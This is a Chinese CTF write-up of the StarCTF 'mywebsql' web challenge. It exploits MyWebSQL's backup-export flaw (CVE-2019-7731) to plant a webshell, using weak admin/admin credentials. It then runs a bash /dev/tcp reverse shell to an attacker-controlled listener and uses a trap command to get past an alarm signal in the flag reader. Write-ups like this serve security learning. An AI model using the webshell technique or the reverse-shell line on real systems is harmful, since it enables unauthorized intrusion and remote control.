由于最近在忙着出国赛的题，对于 StarCTF 也只是看了看，Web 部分总共有三题，最后一个题是最简单的，写完之后其他两题看了看，太费时间就没继续了。但对于做过的题还是有个记录比较好。

1、mywebsql

靶机：

• http://34.92.36.201:10080

• http://35.243.82.53:10080/

• http://35.200.49.109:10080

知识点：程序逻辑过滤不严，反弹 Shell，信号处理

步骤：

1、打开靶机，发现是一个叫 MyWebSQL 的程序。

2、上网一搜，发现其有个 RCE 的 CVE 可以利用。

https://nvd.nist.gov/vuln/detail/CVE-2019-7731

3、根据 https://github.com/eddietcc/CVEnotes/blob/master/MyWebSQL/RCE/readme，大概就是导出备份的时候写入的文件名没过滤，可以写出到任意扩展名的文件，那么我们就可以在数据里藏个 Shell，再将其导出就写 Shell 成功了。

4、那我们来试试，当然先得登录进去。试了试有个弱密码，admin/admin 就可以登录了。

5、那么我们就先创建一个表，叫 glzjin。有一个字段 code 即可。

6、然后来插入一条数据，内容就是我们的 shell。

7、然后导出数据库到文件。

8、访问一下 /backups/glzjin.php，可以看到写 shell 成功了。

9、然后用蚁剑连上看看。

10、点击，打开来浏览一下文件看看，发现根目录下有个 flag 和 readflag。

11、注意，flag 咱们没权限，就得先从有执行权限的 readflag 入手了。打开终端试试。

13、可以看到，咱们什么都还没输入，这个程序就退出了。

14、我们再来反弹一个 Shell 来看看运行有啥结果，在我们自己的有公网 IP 的机器上执行 nc -vv -l -p 8888，监听端口来接收反弹来的 Shell。

15、再在靶机上的 /var/www/html/backups 目录（只有这个目录有写权限）里创建一个 bash 脚本，内容如下，再运行这个程序就可以反弹 Shell 到咱们自己的机器上了。

内容如下：

bash -i >& /dev/tcp/Your IP/8888 0>&1

执行一下，

反弹成功，

16、再次执行 /readflag，未果。

17、那我们把 readflag 下载下来看看。

18、打开 IDA 分析一下。按 F5 看看源码。

可以看到有个 ualarm，这个函数是发时钟信号 SIGALRM 来让终端终止当前程序的。所以造成了我们来不及输入，程序就结束了。

参考资料：https://blog.csdn.net/qq_22863733/article/details/80349120

20、那么我们有没有方法让他不执行呢？有。有个 trap 命令。

参考资料：https://linuxconfig.org/how-to-modify-scripts-behavior-on-signals-using-bash-traps

回到之前我们反弹的 Shell，在这里执行 trap “” 14 ，也就是告诉终端捕捉到 SIGALRM 信号时啥都不做。

21、再执行 /readflag，慢慢算吧。

22、输入正确回答。

23、Flag 到手~